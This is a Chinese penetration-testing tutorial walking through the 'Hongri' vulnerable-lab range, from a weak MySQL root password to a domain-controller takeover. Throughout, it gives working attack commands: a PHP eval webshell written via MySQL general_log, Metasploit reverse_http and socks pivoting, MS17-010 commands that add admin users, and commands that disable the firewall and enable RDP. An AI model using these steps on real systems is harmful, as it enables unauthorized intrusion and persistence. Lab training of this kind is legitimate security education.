ATT&CK红队评估(红日靶场一)
字数 1560 2025-08-11 23:26:41

ATT&CK红队评估(红日靶场一)渗透测试教学文档

靶场环境搭建

  1. 网络配置

    • 新建仅主机模式网络,子网地址设置为192.168.52.0
    • 将Windows 2003和Windows 2008两台主机设置为自定义VMnet16
    • Win7配置:
      • 内网IP: 192.168.52.143
      • 开启phpstudy服务
    • 目标主机IP:
      • Win2003: 192.168.52.141
      • Win2008: 192.168.52.138

  2. 攻击机配置

    • Kali Linux作为攻击主机
    • Kali和Win7的第二个网卡可以在同一自定义仅主机模式网段或NAT下

初始渗透阶段

1. 信息收集

nmap -sS -sV -Pn 192.168.48.144
  • 发现开放端口:
    • 80端口:HTTP网站
    • 3306端口:MySQL数据库

2. Web应用渗透

  1. 访问网站发现phpstudy探针
  2. MySQL弱口令检测:
    • 用户名/密码:root/root
  3. 访问phpMyAdmin后台:
    • 使用root/root成功登录

3. 获取WebShell

  1. 检查数据库导入权限:

    SHOW GLOBAL VARIABLES LIKE '%secure%'
    • 无导入权限

  2. 检查日志记录功能:

    SHOW GLOBAL VARIABLES LIKE '%general%'
    • 日志记录功能关闭

  3. 开启日志记录并写入WebShell:

    SET GLOBAL general_log = ON
SET GLOBAL general_log_file = 'C:/phpstudy/WWW/test.php'
select '<?php eval ($_POST[hack]);?>'

  4. 使用蚁剑连接WebShell:

    • 发现目录中存在另一个网站yxcms

4. 获取CS会话

  1. 使用CS生成木马并通过蚁剑上传执行
  2. 执行后成功上线CS
  3. 优化回显: 
    sleep 0

权限提升

  1. 信息收集:

    whoami
systeminfo
    • 当前权限:administrator
    • 系统补丁:仅安装4个

  2. 使用ms14_058漏洞提权:

    • 提权成功

内网渗透

1. 内网信息收集

  1. 发现内网网段:192.168.52.0/24
  2. 发现存在域环境
  3. 抓取明文密码

2. 与MSF联动

  1. MSF监听设置:

    use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost <本机IP>
set lport <监听端口>
exploit

  2. CS设置Foreign监听:

    • 创建Listener,IP为MSF的IP,端口为MSF监听的端口
    • 在会话上右键选择"新建会话",选择创建的Foreign监听器

  3. MSF建立反向代理:

    run post/multi/manage/autoroute
run autoroute -p
background
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVHOST 127.0.0.1
exploit

  4. 配置proxychains:

    vim /etc/proxychains4.conf

3. 内网主机发现

  1. ARP探测存活主机:

    use post/windows/gather/arp_scanner
set RHOSTS 192.168.52.0/24
set SESSION 1
exploit

  2. UDP协议探测:

    use auxiliary/scanner/discovery/udp_sweep
set RHOSTS 192.168.52.0/24
exploit

  3. 发现三台存活主机

  4. 查看域信息:

    net view
net view /domain

4. 横向渗透

  1. 端口扫描:

    proxychains nmap -sS -sV -Pn 192.168.52.141
proxychains nmap -sS -sV -Pn 192.168.52.138

  2. 针对192.168.52.141(Win2003)的攻击:

    • 发现开放445端口

    • 尝试MS17_010(永恒之蓝)攻击:

      use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.52.141
exploit
      • 存在漏洞但获取shell失败

    • 使用命令执行模块:

      use auxiliary/admin/smb/ms17_010_command
set COMMAND net user
set RHOST 192.168.52.141
exploit

    • 添加用户:

      set COMMAND net user hack qaz@123 /add
set COMMAND net localgroup administrators hack /add

    • 尝试开启3389失败,转而使用Telnet:

      set COMMAND sc config tlntsvr start= auto
set COMMAND net start telnet
set COMMAND netstat -an

    • Telnet登录:

      use auxiliary/scanner/telnet/telnet_login
set RHOSTS 192.168.52.141
set username hack
set PASSWORD qaz@123
exploit
      • 成功控制192.168.52.141

  3. 针对192.168.52.138(Win2008域控)的攻击:

    • 80端口:IIS初始页面,无敏感目录

    • 445端口攻击:

      use auxiliary/admin/smb/ms17_010_command
set COMMAND net user hack qaz@123 /add
set COMMAND net localgroup administrators hack /add

    • 尝试开启Telnet失败(Win2008默认未安装)

    • 关闭防火墙:

      set COMMAND netsh advfirewall set allprofiles state off

    • 开启3389:

      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
net start termservice
      • 开启成功但连接失败

    • 使用CS的SMB Beacon:

      1. 新建监听器,Payload选择Beacon SMB
      2. 使用psexec模块横向移动:
        • 右键目标 → 横向移动 → psexec
      3. 成功拿下域控主机

关键知识点总结

  1. Web渗透

    • phpstudy探针信息泄露
    • MySQL弱口令利用
    • 通过日志记录功能获取WebShell

  2. 权限提升

    • 利用ms14_058漏洞提权
    • 系统补丁信息收集

  3. 内网渗透

    • MSF与CS联动技术
    • 内网主机发现技术(ARP/UDP扫描)
    • 横向移动方法:
      • MS17_010漏洞利用
      • Telnet服务控制
      • SMB Beacon技术

  4. 域控攻击

    • 通过已控主机凭证进行横向移动
    • psexec在域环境中的利用

  5. 规避检测

    • 使用反向代理隐藏攻击流量
    • 多种方法绕过防火墙限制

注意事项

  1. 密码策略限制可能导致简单密码添加失败
  2. 不同Windows版本对服务的支持不同(如Win2008默认无Telnet)
  3. 32位/64位系统对漏洞利用模块的兼容性
  4. 多种方法尝试的重要性(当一种方法失败时及时切换)
ATT&CK红队评估(红日靶场一)渗透测试教学文档 靶场环境搭建 网络配置 : 新建仅主机模式网络,子网地址设置为192.168.52.0 将Windows 2003和Windows 2008两台主机设置为自定义VMnet16 Win7配置: 内网IP: 192.168.52.143 开启phpstudy服务 目标主机IP: Win2003: 192.168.52.141 Win2008: 192.168.52.138 攻击机配置 : Kali Linux作为攻击主机 Kali和Win7的第二个网卡可以在同一自定义仅主机模式网段或NAT下 初始渗透阶段 1. 信息收集 发现开放端口: 80端口:HTTP网站 3306端口:MySQL数据库 2. Web应用渗透 访问网站发现phpstudy探针 MySQL弱口令检测: 用户名/密码:root/root 访问phpMyAdmin后台: 使用root/root成功登录 3. 获取WebShell 检查数据库导入权限: 无导入权限 检查日志记录功能: 日志记录功能关闭 开启日志记录并写入WebShell: 使用蚁剑连接WebShell: 发现目录中存在另一个网站yxcms 4. 获取CS会话 使用CS生成木马并通过蚁剑上传执行 执行后成功上线CS 优化回显: 权限提升 信息收集: 当前权限:administrator 系统补丁:仅安装4个 使用ms14_ 058漏洞提权: 提权成功 内网渗透 1. 内网信息收集 发现内网网段:192.168.52.0/24 发现存在域环境 抓取明文密码 2. 与MSF联动 MSF监听设置: CS设置Foreign监听: 创建Listener,IP为MSF的IP,端口为MSF监听的端口 在会话上右键选择"新建会话",选择创建的Foreign监听器 MSF建立反向代理: 配置proxychains: 3. 内网主机发现 ARP探测存活主机: UDP协议探测: 发现三台存活主机 查看域信息: 4. 横向渗透 端口扫描: 针对192.168.52.141(Win2003)的攻击: 发现开放445端口 尝试MS17_ 010(永恒之蓝)攻击: 存在漏洞但获取shell失败 使用命令执行模块: 添加用户: 尝试开启3389失败,转而使用Telnet: Telnet登录: 成功控制192.168.52.141 针对192.168.52.138(Win2008域控)的攻击: 80端口:IIS初始页面,无敏感目录 445端口攻击: 尝试开启Telnet失败(Win2008默认未安装) 关闭防火墙: 开启3389: 开启成功但连接失败 使用CS的SMB Beacon: 新建监听器,Payload选择Beacon SMB 使用psexec模块横向移动: 右键目标 → 横向移动 → psexec 成功拿下域控主机 关键知识点总结 Web渗透 : phpstudy探针信息泄露 MySQL弱口令利用 通过日志记录功能获取WebShell 权限提升 : 利用ms14_ 058漏洞提权 系统补丁信息收集 内网渗透 : MSF与CS联动技术 内网主机发现技术(ARP/UDP扫描) 横向移动方法: MS17_ 010漏洞利用 Telnet服务控制 SMB Beacon技术 域控攻击 : 通过已控主机凭证进行横向移动 psexec在域环境中的利用 规避检测 : 使用反向代理隐藏攻击流量 多种方法绕过防火墙限制 注意事项 密码策略限制可能导致简单密码添加失败 不同Windows版本对服务的支持不同(如Win2008默认无Telnet) 32位/64位系统对漏洞利用模块的兼容性 多种方法尝试的重要性(当一种方法失败时及时切换)